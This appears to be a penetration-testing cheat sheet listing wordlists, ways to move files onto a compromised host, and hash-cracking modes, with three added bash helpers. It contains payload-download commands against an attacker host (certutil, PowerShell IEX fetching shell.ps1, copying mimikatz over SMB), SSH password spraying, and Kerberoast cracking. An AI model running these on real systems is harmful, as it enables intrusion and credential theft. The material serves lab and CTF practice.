Quick Reference
Wordlists, file transfer methods, and hash cracking cheat sheet.
WORDLISTS
Directory brute forcing
Go-to wordlist for gobuster, feroxbuster, ffuf — 220k entries
gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Password cracking
Standard password wordlist — 14 million entries
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
Alternative directory list
Catches paths that dirbuster misses — 30k entries
gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
Subdomain / vhost scanning
Top subdomains for vhost discovery (5k entries). gobuster 3.2 and later need --append-domain so each word is tried as word.domain.com; without it only the bare word is sent as the Host header.
gobuster vhost -u http://domain.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
gobuster dns -d domain.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Username enumeration
Common first names as usernames (10k entries). VRFY is often disabled, so smtp-user-enum also offers -M EXPN and -M RCPT. The hydra line sprays one password across every user (-p), which stays under most lockout thresholds, but check the lockout policy before running it.
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t $IP
hydra -L /usr/share/seclists/Usernames/Names/names.txt -p 'Password1' $IP ssh
SNMP community strings
Brute force SNMP community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt $IP
Install SecLists
Massive collection of wordlists — Discovery, Fuzzing, Passwords, Usernames
sudo apt install seclists -y
ls /usr/share/seclists/
FILE TRANSFER METHODS
Host files on attacker (HTTP)
Start a web server in your current directory; the most common transfer method. Binding port 80 needs root (sudo); otherwise pick a high port such as 8000 and put it in the download URLs.
python3 -m http.server 80
Download to Linux target
wget or curl — Try both if one isn't available
wget http://$LHOST/linpeas.sh -O /tmp/linpeas.sh
curl http://$LHOST/chisel -o /tmp/chisel
Download to Windows target (certutil)
Ships with Windows, but it is a well-known LOLBin: Defender and most EDR products flag certutil downloads, so expect it to be logged or blocked on hardened hosts.
certutil -urlcache -split -f http://$LHOST/shell.exe C:\Temp\shell.exe
Download to Windows target (PowerShell)
Several methods; try the next one if one is blocked. The IEX/DownloadString form runs the script in memory without writing to disk (AMSI still inspects it). $LHOST is a placeholder: PowerShell would expand it as its own, empty, variable, so type the attacker IP literally.
Invoke-WebRequest -Uri http://$LHOST/shell.exe -OutFile C:\Temp\shell.exe
(New-Object Net.WebClient).DownloadFile('http://$LHOST/shell.exe','C:\Temp\shell.exe')
IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/shell.ps1')
Host files on attacker (SMB)
When HTTP is blocked on the target; convenient for Windows because copy and net use speak SMB natively. Recent Windows builds refuse unauthenticated (guest) SMB access, so pass -username and -password to impacket-smbserver and supply the same credentials with net use before copying.
# On attacker:
impacket-smbserver share . -smb2support
# On Windows target:
copy \\$LHOST\share\mimikatz.exe C:\Temp\
Netcat file transfer
Raw TCP, when nothing else works. The roles can be swapped (listen on the target, push from the attacker). The transfer ends silently, so compare md5sum or sha256sum output on both ends; with OpenBSD netcat add -N so the sender closes the connection at EOF.
# On attacker (send):
nc -nlvp 4444 < linpeas.sh
# On target (receive):
nc $LHOST 4444 > /tmp/linpeas.sh
Base64 encode/decode
Copy-paste through the terminal when every transfer channel is blocked. -w 0 (GNU base64) disables line wrapping so the output is one pasteable string; verify with md5sum or sha256sum on both ends, because a clipped paste decodes silently into a truncated file.
# On attacker (encode):
base64 -w 0 file.bin
# On target (decode):
echo 'BASE64STRING' | base64 -d > file.bin
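Neither the netcat nor the base64 transfer above checks that the bytes arrived intact. The following is an added example, not part of the original cheat sheet: two bash functions that wrap a file in a paste-friendly base64 payload carrying its SHA-256 and verify it on the receiving side. It assumes GNU coreutils (base64 -w, sha256sum); the file names are placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): paste-friendly base64 transfer
# with an embedded SHA-256 so a truncated or corrupted paste is detected.
# Assumes GNU coreutils (base64 -w, sha256sum).
set -eu

# b64_pack FILE -> stdout: header line "SHA256:<hex>" followed by base64 wrapped
# at 76 columns (wrapped lines survive terminal copy-paste better than one long line).
b64_pack() {
  local f=$1 sum
  sum=$(sha256sum "$f" | cut -d' ' -f1)
  printf 'SHA256:%s\n' "$sum"
  base64 -w 76 "$f"
}

# b64_unpack OUT < payload : decode into OUT and compare its SHA-256 with the header.
# Returns 0 on a verified transfer, 1 on a missing header or a checksum mismatch.
b64_unpack() {
  local out=$1 header expected actual
  IFS= read -r header
  case $header in
    SHA256:*) expected=${header#SHA256:} ;;
    *) echo "b64_unpack: missing SHA256 header" >&2; return 1 ;;
  esac
  # base64 -d exits non-zero on garbage input; the checksum is the real verdict
  base64 -d > "$out" 2>/dev/null || true
  actual=$(sha256sum "$out" | cut -d' ' -f1)
  if [ "$actual" != "$expected" ]; then
    echo "b64_unpack: checksum mismatch (expected $expected, got $actual)" >&2
    return 1
  fi
  echo "b64_unpack: verified $out" >&2
  return 0
}

# Usage (placeholder file names):
#   attacker:  b64_pack linpeas.sh          # copy everything it prints
#   target:    b64_unpack /tmp/linpeas.sh   # paste, then Ctrl-D
```

On a target without these functions, paste the base64 lines into `base64 -d > file` by hand and compare `sha256sum file` with the header line; the functions only automate that comparison.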
HASH CRACKING
Identify hash type
Always identify before cracking; the format determines the hashcat mode. hashid -m prints the matching hashcat mode(s). Quote the hash in single quotes so the shell does not expand $6$ and similar.
hashid -m '$6$rounds=5000$salt$hash'
hash-identifier
Common Hash Formats
MD5: 32 hex chars → hashcat -m 0
SHA1: 40 hex chars → hashcat -m 100
SHA256: 64 hex chars → hashcat -m 1400
SHA512 (raw): 128 hex chars → hashcat -m 1700
NTLM: 32 hex chars (no salt) → hashcat -m 1000 (same length as MD5; decide from where the hash came from, e.g. a SAM or NTDS dump is NTLM)
NTLMv2: user::domain:challenge... → hashcat -m 5600
bcrypt: $2a$, $2b$ or $2y$ prefix → hashcat -m 3200
Kerberoast: $krb5tgs$23$*... → hashcat -m 13100
AS-REP: $krb5asrep$23$... → hashcat -m 18200
md5crypt: $1$ prefix → hashcat -m 500
sha512crypt: $6$ prefix → hashcat -m 1800
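The table above is what you apply by hand to each line of a dump. As an added example (not from the original page), here is a bash version of that triage: it guesses the mode from prefix and length, flags the MD5/NTLM ambiguity instead of guessing, and splits a mixed hash file into one file per mode, since hashcat runs a single mode at a time and skips lines that do not parse in it. Mode numbers are the ones in the table; the sample hashes used in the test are constructed.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): route each line of a hash file to a
# hashcat mode using the prefix/length rules of the format table above.
set -eu

# guess_mode HASH -> prints a hashcat mode, "0|1000" for ambiguous 32-hex (MD5 or NTLM),
# or "?" when nothing in the table matches.
guess_mode() {
  local h=$1
  case $h in
    '$6$'*)                  echo 1800 ;;   # sha512crypt
    '$1$'*)                  echo 500 ;;    # md5crypt
    '$2a$'*|'$2b$'*|'$2y$'*) echo 3200 ;;   # bcrypt
    '$krb5tgs$23$'*)         echo 13100 ;;  # Kerberoast, RC4 TGS-REP
    '$krb5asrep$23$'*)       echo 18200 ;;  # AS-REP roast, RC4
    *'::'*':'*':'*':'*)      echo 5600 ;;   # NTLMv2: user::domain:challenge:response:blob
    *)
      # unsalted hex digests: only the length distinguishes them
      if printf '%s\n' "$h" | grep -Eq '^[0-9a-fA-F]+$'; then
        case ${#h} in
          32)  echo '0|1000' ;;   # MD5 or NTLM: same length, decide from the source
          40)  echo 100 ;;        # SHA1
          64)  echo 1400 ;;       # SHA256
          128) echo 1700 ;;       # raw SHA512 (not sha512crypt)
          *)   echo '?' ;;
        esac
      else
        echo '?'
      fi ;;
  esac
}

# split_by_mode IN OUTDIR : write OUTDIR/mode-<n>.txt per detected mode, plus
# ambiguous-md5-or-ntlm.txt and unknown.txt; prints a line count per output file.
split_by_mode() {
  local in=$1 out=$2 line m f
  mkdir -p "$out"
  while IFS= read -r line || [ -n "$line" ]; do
    [ -z "$line" ] && continue
    m=$(guess_mode "$line")
    case $m in
      '0|1000') f="$out/ambiguous-md5-or-ntlm.txt" ;;
      '?')      f="$out/unknown.txt" ;;
      *)        f="$out/mode-$m.txt" ;;
    esac
    printf '%s\n' "$line" >> "$f"
  done < "$in"
  for f in "$out"/*.txt; do
    printf '%s: %s\n' "$f" "$(( $(wc -l < "$f") ))"
  done
}

# Usage: split_by_mode hashes.txt sorted/   then e.g. hashcat -m 1800 sorted/mode-1800.txt rockyou.txt
```

The ambiguous file is deliberate: running 32-hex lines as -m 0 when they are NTLM (or the reverse) wastes the whole run, so that decision stays with the operator.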
John the Ripper
Auto-detects hash type — Good general purpose cracker
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
Hashcat — MD5
Mode 0; unsalted and among the fastest hashes to crack.
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat — SHA256
Mode 1400
hashcat -m 1400 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat — NTLM
Mode 1000 — Windows local password hashes, very fast
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat — NTLMv2
Mode 5600 — Captured from Responder or network sniffing
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat — bcrypt
Mode 3200; deliberately slow (the cost factor is inside the hash: $2y$10$ means 2^10 rounds), so a full rockyou pass can take days. Use a short, targeted list; rules multiply the candidate count, so stack them on a short list, not on rockyou.
hashcat -m 3200 hash.txt targeted.txt -r /usr/share/hashcat/rules/best64.rule
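A short targeted list for slow hashes has to come from somewhere. As an added example, not from the original page: a bash generator that turns a few seed words (company, product, season) into case, leet and suffix variants and deduplicates them. The seed words and the suffix set are illustrative assumptions; a real engagement list is built from the target's own vocabulary.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): build a short, targeted wordlist for
# slow hashes (bcrypt, sha512crypt) from seed words. Each seed yields case variants
# and one leet variant, each crossed with a small suffix set (assumed, adjust per target).
set -eu

# mutate WORD -> lowercase, UPPERCASE, Capitalised and a leet form of the capitalised
# word, one per line (may repeat when the word has no leet-able letters)
mutate() {
  local w=$1 lower upper cap
  lower=$(printf '%s\n' "$w" | tr 'A-Z' 'a-z')
  upper=$(printf '%s\n' "$w" | tr 'a-z' 'A-Z')
  cap=$(printf '%s\n' "$lower" | cut -c1 | tr 'a-z' 'A-Z')$(printf '%s\n' "$lower" | cut -c2-)
  printf '%s\n%s\n%s\n' "$lower" "$upper" "$cap"
  # leet: a->4 e->3 i->1 o->0 s->5 on the capitalised form
  printf '%s\n' "$cap" | tr 'aeios' '43105'
}

# targeted_wordlist SEED... -> deduplicated candidates on stdout:
# every mutation bare, then with each suffix appended
targeted_wordlist() {
  local w m s
  for w in "$@"; do
    mutate "$w" | while IFS= read -r m; do
      printf '%s\n' "$m"
      for s in 1 123 '!' 2023 2024 2025 '2024!' '2025!'; do
        printf '%s%s\n' "$m" "$s"
      done
    done
  done | awk '!seen[$0]++'
}

# Usage: targeted_wordlist Acme Winter > targeted.txt
#        hashcat -m 3200 hash.txt targeted.txt
```

Two seeds give 72 candidates here, which bcrypt at cost 10 exhausts in seconds; rockyou with best64 would be roughly a billion. Add seeds, not rules, when the list comes up empty.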
Hashcat — Kerberoast (TGS-REP)
Mode 13100 — Cracking Kerberoasted service account hashes
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat — AS-REP Roast
Mode 18200; AS-REP hashes from accounts with Kerberos pre-authentication disabled (DONT_REQ_PREAUTH).
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
Online hash lookup
Instant results for common unsalted hashes; the hash leaves your control, so use this for CTF or otherwise non-sensitive material only.
# Paste hash at:
# https://crackstation.net/
# https://hashes.com/en/decrypt/hash